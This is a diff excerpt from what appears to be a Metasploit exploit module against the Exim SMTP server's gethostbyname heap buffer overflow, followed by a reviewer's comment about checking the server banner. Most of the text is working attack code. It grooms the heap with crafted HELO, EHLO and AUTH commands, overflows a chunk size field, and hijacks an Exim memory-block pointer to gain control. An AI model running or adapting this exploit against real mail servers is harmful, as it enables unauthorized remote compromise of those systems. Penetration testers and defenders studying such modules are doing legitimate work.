modules/exploits/linux/smtp/exim_gethostbyname_bof.rb

```diff
@@ -0,0 +1,725 @@
+             "501 : sender address must contain a domain\r\n\0".length)
+    smtp_recv(501, 'sender address must contain a domain')
+
+    smtp_send("RSET")
+    smtp_recv(250)
+
+    # bulletproof Heap Feng Shui; the hard part is avoiding:
+    # "Too many syntax or protocol errors" (3)
+    # "Too many unrecognized commands" (3)
+    # "Too many nonmail commands" (10)
+
+    # / 5, because "\x7F" is non-print, and:
+    # ss = store_get(length + nonprintcount * 4 + 1);
+    smtp_send("BAD1 ", "", "\x7F", "", "", (19*1024 + heap_shift) / 5)
+    smtp_recv(500, '\A500 unrecognized command\r\n\z')
+
+    smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 5*1024+13-1)
+    smtp_recv(250)
+
+    smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 3*1024+13-1)
+    smtp_recv(250)
+
+    smtp_send("BAD2 ", "", "\x7F", "", "", (13*1024 + 128) / 5)
+    smtp_recv(500, '\A500 unrecognized command\r\n\z')
+
+    smtp_send("HELO ", "", "0", @sender[:hostaddr8], "", 3*1024+16+13-1)
+    smtp_recv(250)
+
+    # overflow (3 bytes) gethostbyname's buffer, and
+    # overwrite its next_chunk's size field with 0x003?31
+                                                    # ^ last_digit
+    smtp_send("EHLO ", "", "0", ".1#{last_digit}", "", 5*1024+64+3-1)
+    smtp_recv(HELO_CODES)       # ^ 0x30 | PREV_INUSE
+
+    # auth_xtextdecode() is the only way to overwrite the beginning of a
+    # current_block of memory (the "storeblock" structure) with arbitrary data
+    # (so that our hijacked "next" pointer can contain NUL, CR, LF characters).
+    # this shapes the rest of our exploit: we overwrite the beginning of the
+    # current_block of POOL_PERM memory with the current_block of POOL_MAIN
+    # memory (allocated by auth_xtextdecode()).
+
+    auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)
+    (x86 ? 4 : 8).times { |i| auth_prefix += sprintf("+%02x", (where >> (i*8)) & 255) }
+    auth_prefix += "."
+
+    # also fill log_buffer with alpha chars
+    smtp_send("MAIL FROM:<> AUTH=", auth_prefix, method(:rand_text_alpha), "+", "", 0x3030)
+    smtp_recv(501, 'invalid data for AUTH')
+
+    smtp_send("HELO ", "[1:2:3:4:5:6:7:8%eth0:", " ", "#{what}]", "", len)
+    begin
+      reply = smtp_recv(ANY_CODE)
+      return reply if reply[:code] !~ /#{HELO_CODES}/
+      return reply if reply[:code] != "250" and reply[:lines].first !~ /argument does not match calling host/
+
+      smtp_send("MAIL FROM:<>")
+      reply = smtp_recv(ANY_CODE)
+      return reply if reply[:code] != "250"
+
+      smtp_send("RCPT TO:<postmaster>")
+      reply = smtp_recv
+      return reply
+
+    rescue
+      return nil
+    end
+
+  ensure
+    smtp_disconnect
+  end
+
+  DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'
+  DOT = '[.]'
+
+  def smtp_connect(exploiting = true)
+    fail_with("smtp_connect", "sock isn't nil") if sock
+
+    connect
+    fail_with("smtp_connect", "sock is nil") if not sock
+    @smtp_state = :recv
+
+    banner = smtp_recv(220)
```

Comment:
I noticed that ```banner``` is not being used. Do you think it might be worthwhile to check for Exim in the 220?